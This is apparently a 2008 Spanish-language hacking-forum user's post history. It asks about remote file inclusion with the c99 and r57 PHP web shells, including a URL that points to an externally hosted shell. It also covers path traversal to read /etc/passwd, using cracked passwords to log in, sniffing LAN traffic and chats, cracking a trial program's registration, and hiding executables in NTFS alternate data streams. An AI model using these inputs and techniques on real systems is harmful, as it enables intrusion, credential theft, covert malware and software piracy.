| |
|
1
|
Seguridad Informática / Bugs y Exploits / Re: c99.txt y r57.txt
|
en: 30 Mayo 2008, 22:41
|
mm todavia con el ? al final no funciona, seguro que no es vulnerable.  Y seguro que es vulnerable? no es inclusion por iframes?  Suele pasar checa si en lugar de hacer include con php sea con iframes, o frames como verifico esto? es que hace poco que estoy con esto y XSS y estoy bastante en bolas. me fijè en el codigo fuente de la pagina y creo que puede ser algo de lo que decis <html><head><title>www.google.com</title></head><frameset rows="100,*" frameborder="0" border="0" framespacing="0"><frame noresize="noresize" src="allc_header.php?url=www.google.com" scrolling=no marginwidth=0 marginheight=0> <frame src=http://www.google.com><noframes>Your browser does not support frames. allc.com uses frames to display results. You can view the <a href=http://www.google.com>referring page</a> </noframes></frameset></html> si es esto, como tendria que decir en el codigo fuente para saber que es vulnerable? o que es lo que tendria que detectar ademas de que abra google? ah y de verdad muchas gracias a los dos por darme una mano |
|
|
|
|
2
|
Seguridad Informática / Bugs y Exploits / Re: c99.txt y r57.txt
|
en: 30 Mayo 2008, 18:35
|
se que es una shell, lo del troyano es por lo rapido que un troyano pierde su utilidad cuando se hace conocido, y pensaba que con estas shells podria pasar lo mismo. alguien me podria decir porque esto funciona: php?url=www.google.com y esto no funciona php?url=usuarios.lycos.es/theripperm/shell/r57.txt este ultimo solo me muestra el contenido del txt y no me ejecuta ninguna shell, pude ser porque dice url, y quizas deberia decir page o file ? o algo asi?  |
|
|
|
|
4
|
Seguridad Informática / Hacking Básico / Re: sniffer para ver archivos enviados ?
|
en: 28 Mayo 2008, 16:48
|
http://www.networkactiv.com/PIAFCTM.htmlimposible no poder usarlo, lo usé yo y eso es garantia  cuando empieza a sniffar, haces clic sobre uno de los paquetes vas paquete por paquete y te muestra el contenido en hexadecimal, en decimal o en texto. (quitale la opcion de hacer beep cada vez que recibe un mensaje porque te vas a vover loco) tiene un buscador asi que podes buscar una palabra entre todos los paquetes que recibiste, esta bueno para buscar GETs, POSTs, etc Ademas tambien podes poner filtros, como por ejemplo que solo te muestre los paquetes que son enviados al puerto remoto 21 y solo te va a mostrar lo que sea enviado a un servidor ftp. Espero que te sea util.
|
|
|
|
|
8
|
Seguridad Informática / Hacking Básico / Re: Encontre un sniffer que se cag@ en los switchs de las LANs XD
|
en: 24 Mayo 2008, 12:38
|
empecè a investigar un poco y RDG PackerDetector se ve que el Big Boss está hecho en Delphi y que no esta empaquetado con nada y eso es una tranquilidad, entonces con el DeDe (Delphi Decompiler) se destripa el programa y se busca la RVA (relative virtual address) del evento OnClic del boton Registrar(R) del formulario de registro. Si investigan por ahi con el Ollly, ponen un breakpoint en la RVA y ejecutan el programa, despues van a registrarse ingresen un serial cualquiera y debugeando van a ver que el serial tiene que ser de 32 digitos, pero el registro se hace via web asi que habria que usar la opcion de registrarse a traves de un proxy y ver los paquetes de datos y buscar esas cadenas con el olly o si no puede usar un sniffer como el PIAFCTM ( http://www.networkactiv.com/NetworkActivPIAFCTMv1.5.exe, esta version vieja es mejor que la nueva para mi, usen el "packet mode" para ver los datos de los paquetes.) Digo lo de usar el PIAFCTM porque intente buscar la api connect() de WS2_32.dll pero no encontre llamadas desde el modulo principal, algo facil de seguir, sino que encontre que se llama desde alguna funcion desde una de las dll que acompañan al programa y no tengo conocimientos tan avanzados o ya estaba cansado o las dos cosas. Otra cosa, el programa se conecta a un servidor y opera con una base de datos MySQL asi que este "ejercicio" se podria hacer de otros modos, pero tampoco tengo ese nivel.  Si alguien quiere sumarse para intentar ****kearlo, si necesita, paso los datos mas precisos como offsets e imagenes. Repito esto es solo con propósitos educacionales, al principio era conocer una herramienta y ahora se trata de la proteccion del software |
|
|
|
|
9
|
Seguridad Informática / Hacking Básico / Re: Encontre un sniffer que se cag@ en los switchs de las LANs XD
|
en: 23 Mayo 2008, 00:24
|
instale el big boss pero cuando quiero entrar al progama me pide
server =
user name=
password=
y 2 botones "logon" y "logoff" y si no pongo datos no entra y si cierro la ventana se cierra el programa
a por cierto no me funciono el crack
que datos debo de poner en esa casillas
cuando inicio el programa me pide esos datos, solo que el nombre de usuario ya viene lleno y solo le doy directamente a logon y entra. El pasword que te pide es para cuando minimizas el programa y cuando lo queres volver a abrir te pide ese password, como no le pongo nada directamente le doy enter y listo... creo que es solo para eso, cuando te aparezca solo dale a logon. hey gracias a todos por hacer el aguante con lo de la busquedad del crack. |
|
|
|
|
11
|
Seguridad Informática / Hacking / duda con passwords de ususarios en linux
|
en: 20 Mayo 2008, 20:28
|
estoy leyendo sobre local file inclusion y siempre aparece el mismo ejemplo de poner en la url vulnerable ../../../../../../../etc/passwd los archivos siempre tiene un contenido mas o menos asi root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
pero los paswords pueden estar en etc/shadow, todavia no vi ninguno, con que algoritmo estan cifrados? otra cosa.. una vez que uno se hace con el password? que servicio hay que utilizar para ingresar a esa cuenta? Gracias por leer hasta aca. |
|
|
|
|
12
|
Seguridad Informática / Hacking Básico / Encontre un sniffer que se cag@ en los switchs de las LANs XD
|
en: 20 Mayo 2008, 20:08
|
naufragando encontre un sniffer o una familia de sniffers que lo hacen sin importar que haya un switch en la red local, muestra las paginas navegadas, con imagenes bien comodas, las charlas del msn... que se yo con eso cumple para cualquier idiota como yo  no necesita ningun tipo de configuracion, no tuve problemas por elegir la placa de red en ningun menu o que la version de winpcap que necesita no la escribio el papa. se llaman big mother, big father y big boss, y pueden buscar en el google la palabra switchsniff el unico problema es que como es una version trial no muestra todas las maquinas y algunas cosas estan incompletas. Busque un serial number o un crack y no encontre... Bueno espero que les sea util y si alguien se entera de alguna version full, crack o serial si puede avisar mejor. Saludos. |
|
|
|
|
13
|
Seguridad Informática / Hacking Básico / Ocultar archivos dentro de otros manualmente sin aumentar el tamaño original :)
|
en: 15 Mayo 2008, 14:38
|
hace poco encontre esto, espero que les guste: esto se hace desde consola en windows: C:\>dir
El volumen de la unidad C no tiene etiqueta.
El número de serie del volumen es: AC4E-E07A
Directorio de C:\
15/05/2008 08:17 a.m. <DIR> Archivos de programa
02/02/2008 04:43 p.m. 0 AUTOEXEC.BAT
02/02/2008 04:43 p.m. 0 CONFIG.SYS
27/02/2008 09:35 a.m. 0 dfinstall.log
15/05/2008 09:24 a.m. 589.878 Dibujo.bmp <--- acá tengo 2 imágenes
15/05/2008 09:25 a.m. 589.878 Dibujo2.bmp
02/02/2008 05:12 p.m. <DIR> Documents and Settings
27/02/2008 09:35 a.m. 7.372.288 Persi0.sys
02/02/2008 05:17 p.m. <DIR> Program Files
02/02/2008 05:22 p.m. 163 sisvga.log
02/02/2008 05:26 p.m. 164 soundmax.log
02/02/2008 05:30 p.m. <DIR> TempEI4
15/05/2008 08:15 a.m. <DIR> WINDOWS
02/02/2008 05:51 p.m. 146 YServer.txt
9 archivos 8.552.517 bytes
5 dirs 4.349.296.640 bytes libres
C:\>type c:\dibujo2.bmp > dibujo.bmp:oculto.bmp <-- acà está el truco
C:\>dir
El volumen de la unidad C no tiene etiqueta.
El número de serie del volumen es: AC4E-E07A
Directorio de C:\
15/05/2008 08:17 a.m. <DIR> Archivos de programa
02/02/2008 04:43 p.m. 0 AUTOEXEC.BAT
02/02/2008 04:43 p.m. 0 CONFIG.SYS
27/02/2008 09:35 a.m. 0 dfinstall.log
15/05/2008 09:27 a.m. 589.878 Dibujo.bmp <--- no cambia de tamaño
15/05/2008 09:25 a.m. 589.878 Dibujo2.bmp
02/02/2008 05:12 p.m. <DIR> Documents and Settings
27/02/2008 09:35 a.m. 7.372.288 Persi0.sys
02/02/2008 05:17 p.m. <DIR> Program Files
02/02/2008 05:22 p.m. 163 sisvga.log
02/02/2008 05:26 p.m. 164 soundmax.log
02/02/2008 05:30 p.m. <DIR> TempEI4
15/05/2008 08:15 a.m. <DIR> WINDOWS
02/02/2008 05:51 p.m. 146 YServer.txt
9 archivos 8.552.517 bytes
5 dirs 4.348.702.720 bytes libres <-- fijense que el espacio libre en el disco disminuyò (por ahi hay algo que no habia y es el agregado hecho a dibujo.bmp)
C:\>del dibujo2.bmp <-- borro el dibujo2
C:\>dir
El volumen de la unidad C no tiene etiqueta.
El número de serie del volumen es: AC4E-E07A
Directorio de C:\
15/05/2008 08:17 a.m. <DIR> Archivos de programa
02/02/2008 04:43 p.m. 0 AUTOEXEC.BAT
02/02/2008 04:43 p.m. 0 CONFIG.SYS
27/02/2008 09:35 a.m. 0 dfinstall.log
15/05/2008 09:27 a.m. 589.878 Dibujo.bmp <-- el dibujo2 ya no esta y el tamaño del dibujo esta como al principio
02/02/2008 05:12 p.m. <DIR> Documents and Settings
27/02/2008 09:35 a.m. 7.372.288 Persi0.sys
02/02/2008 05:17 p.m. <DIR> Program Files
02/02/2008 05:22 p.m. 163 sisvga.log
02/02/2008 05:26 p.m. 164 soundmax.log
02/02/2008 05:30 p.m. <DIR> TempEI4
15/05/2008 08:15 a.m. <DIR> WINDOWS
02/02/2008 05:51 p.m. 146 YServer.txt
8 archivos 7.962.639 bytes
5 dirs 4.349.296.640 bytes libres
C:\>mspaint dibujo.bmp <-- se abre el paint y muestra el dibujo
C:\>mspaint dibujo.bmp:oculto.bmp <-- se abre el paint y muestra el dibujo2
C:\> Esto se pude hacer metiendo imagenes en textos, textos en imagenes, ejecutables en imagenes, ejecutables en texto, texto en ejecutables.. bueno se entiende. Esto lo vi en un video, y en el video metia un exe en un txt, algo asi: c:\edit texto.txt (crean un texto y lo guardan) c:\type c:\windows\system32\calc.exe > texto.txt:calculadora.exe c:\start c:\texto.txt:calculadora.exedetalle: si la ultima linea fuese: c:\start texto.txt:calculadora.exe (sin c:\) no funcionaria creen un archivo bat que se llama calculadora.bat y que contenga esto: copy texto.txt c:\ start c:\texto.txt:calculadora.exe metan el txt y el bat en un rar y fijense Espero que les guste y les sea util. |
|
|
|
|
15
|
Seguridad Informática / Hacking / Re: Ahora tocan las ecus de los coches
|
en: 11 Mayo 2008, 00:59
|
Creo que solo vas a usar los frenos mientras el auto este en movimiento y si esta en movimiento va a estar generando energia para alimentar a la bateria. Y de ultima el freno de mano ¿no que es mecanico? Buscando sobre lo que dijiste me entere de esto: Es la bateria
La situacion es diferente si se han dejado los faros, que si ha olvidado la radio o una luz interior. Si se olvidan los faros encendidos, siempre queda algo de bateria. Como es una carga de corriente alta, no se activan directamente con el mando de las luces. Sino que estos activan un rele que es el que enciende las luces. Cuando la tension de la bateria no es capaz de activar el rele las luces se apagan, pero sigue quedando energia para activar el cierre centralizado y otras cosas de bajo consumo. Si se olvida una luz interior por ejemplo, puede que no funcionen ni ventanillas y CCentralizado. Esta situacion es peor porque en coches muy nuevos, puede ser imposible arrancarlo empujando. No tiene energia suficiente ni para alimentar la centralita electronica, que controla el motor.
Y otra cosa en el diagrama que pusiste no veo donde esta el bluetooth, perdon si se me paso por alto, pero de todos modos lo de actuar mediante el bluetooth sobre los elementos del UCE es una supocision o es real? |
|
|
|
|
|
| |
|
Mostrar Mensajes
